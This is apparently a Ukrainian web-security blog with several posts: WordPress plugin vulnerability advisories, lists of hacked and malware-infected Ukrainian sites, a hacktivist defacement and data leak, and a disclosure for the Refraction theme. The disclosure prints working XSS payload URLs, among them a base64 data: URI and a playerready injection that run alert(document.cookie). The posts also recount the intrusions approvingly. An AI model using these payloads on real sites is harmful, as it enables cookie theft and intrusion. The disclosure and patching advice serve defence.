Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах VideoWhisper Live Streaming, BSK PDF Manager та Sixtees. Для котрих з’явилися експлоіти. VideoWhisper Live Streaming - це плагін для трансляції відео, BSK PDF Manager - це плагін для управління pdf документами, Sixtees - це тема движка.

• WordPress VideoWhisper Live Streaming 4.29.6 Cross Site Scripting (деталі)
• WordPress BSK PDF Manager 1.3 Cross Site Scripting (деталі)
• WordPress Sixtees Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В ніч з четверга на п’ятницю, 02.10.2014, Українські Кібер Війська звернулися до Петра Олексійовича Порошенка. Звернення Українських Кібер Військ було розміщене на сайті Державної служби зайнятості. Стосовно звільнення Гелетея з посади Міністра Оборони України.

Саме звернення розмістили через XSS уразливість на dcz.gov.ua. На цьому сайті я виявив дві Cross-Site Scripting уразливості.

Раніше я вже писав про уразливості на kvs.gov.ua, dcz.gov.ua та kmu.gov.ua.

Ось демонстрація звернення.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://ratadmin.gov.ua (хакером KkK1337) - 09.09.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.manadm.gov.ua (хакером KkK1337) - 09.09.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://okotel.net.ua (хакером xWARRIORtn) - 25.06.2014, зараз сайт вже виправлений адмінами
• http://uavisti.info (хакером xWARRIORtn) - 25.06.2014, зараз сайт вже виправлений адмінами
• http://varta.kiev.ua (хакером xWARRIORtn) - 25.06.2014, зараз сайт вже виправлений адмінами

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://kamadm.gov.ua - інфікований державний сайт - інфекція була виявлена 28.07.2014. Зараз сайт не входить до переліку підозрілих.
• http://vuderta-school.at.ua - інфекція була виявлена 22.07.2014. Зараз сайт не входить до переліку підозрілих.
• http://snasti.com.ua - інфекція була виявлена 30.09.2014. Зараз сайт входить до переліку підозрілих.
• http://kamvpu.ucoz.ua - інфекція була виявлена 18.07.2014. Зараз сайт не входить до переліку підозрілих.
• http://veteran.kiev.ua - інфекція була виявлена 18.09.2014. Зараз сайт не входить до переліку підозрілих.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах All In One Carousel, Post To PDF та Widget Control. Для котрих з’явилися експлоіти. All In One Carousel - це плагін для ротації банерів, Post To PDF - це плагін для публікації в формат PDF, Widget Control - це плагін для керування віджетами.

• Wordpress all_in_one_carousel Plugin XSS, CSRF Vuln (деталі)
• WordPress Post To PDF 2.3.1 Cross Site Scripting (деталі)
• WordPress Widget Control 1.0.1 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Раніше я вже писав про численні уразливості в численних темах для WordPress виробництва RocketTheme. Окрім тем цих розробників я виявив подібні уразливості в багатьох темах інших розробників (в тому числі в custom темах).

Інформую про Cross-Site Scripting, Content Spoofing та Full path disclosure уразливості в темі Refraction для WordPress. Розробленої RocketTheme.

Папка теми може називатися refraction або rt_refraction_wp.

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Ця XSS уразливість є лише в нових версіях теми з 5.x версією JW Player:

http://site/wp-content/themes/rt_refraction_wp/js/rokbox/jwplayer/jwplayer.swf?playerready=alert(document.cookie)

Content Spoofing (WASC-12):

http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

Full path disclosure (WASC-13):

В папці http://site/wp-content/themes/refraction/ (http://site/wp-content/themes/rt_refraction_wp/) в index.php та багатьох інших php-файлах теми є FPD, що спрацьовують при налаштуваннях PHP по замовчуванню.

Уразливі всі версії теми Refraction для WordPress.

У серпні Українські Кібер Війська окрім того, що взломали сайт Міністерства Оборони РФ, також взломали державний сервер Російської Федерації.

09.08.2014 Українські Кібер Війська захопили російських державний сервер. Всього було отримано та викладено в Інтернет 9,13 ГБ даних в архівах. В розархівованому вигляді це 33,97 ГБ даних.

Для демонстрації спочатку я розмістив один документ, а сьогодні ще два документи з цього серверу.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://dik.gov.ua (хакером Lootz) - 04.09.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://chasovrada.gov.ua (хакером Ali-HAwleRy) - 10.09.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://okotele.com (хакером xWARRIORtn) - 25.06.2014, зараз сайт вже виправлений адмінами
• http://okotel.net (хакером xWARRIORtn) - 25.06.2014, зараз сайт вже виправлений адмінами
• http://ptf.kiev.ua (хакером xWARRIORtn) - 25.06.2014, зараз сайт вже виправлений адмінами

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах EasyMedia Gallery, Thank You Counter Button та Zedity. Для котрих з’явилися експлоіти. EasyMedia Gallery - це плагін для створення медіа галерей, Thank You Counter Button - це плагін для додавання кнопки “Thank You” з рахівником натискань, Zedity - це візуальний текстовий редактор.

• WordPress EasyMedia Gallery 1.2.29 Cross Site Scripting (деталі)
• WordPress Thanks You Counter Button 1.8.7 Cross Site Scripting (деталі)
• WordPress Zedity 2.4.0 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://mastersam.com.ua - інфекція була виявлена 14.09.2014. Зараз сайт входить до переліку підозрілих.
• http://catalog.if.ua - інфекція була виявлена 14.09.2014. Зараз сайт не входить до переліку підозрілих.
• http://list.poltava.ua - інфекція була виявлена 13.09.2014. Зараз сайт не входить до переліку підозрілих.
• http://poltava.info - інфекція була виявлена 13.09.2014. Зараз сайт не входить до переліку підозрілих.
• http://globalmarket.com.ua - інфекція була виявлена 22.09.2014. Зараз сайт не входить до переліку підозрілих.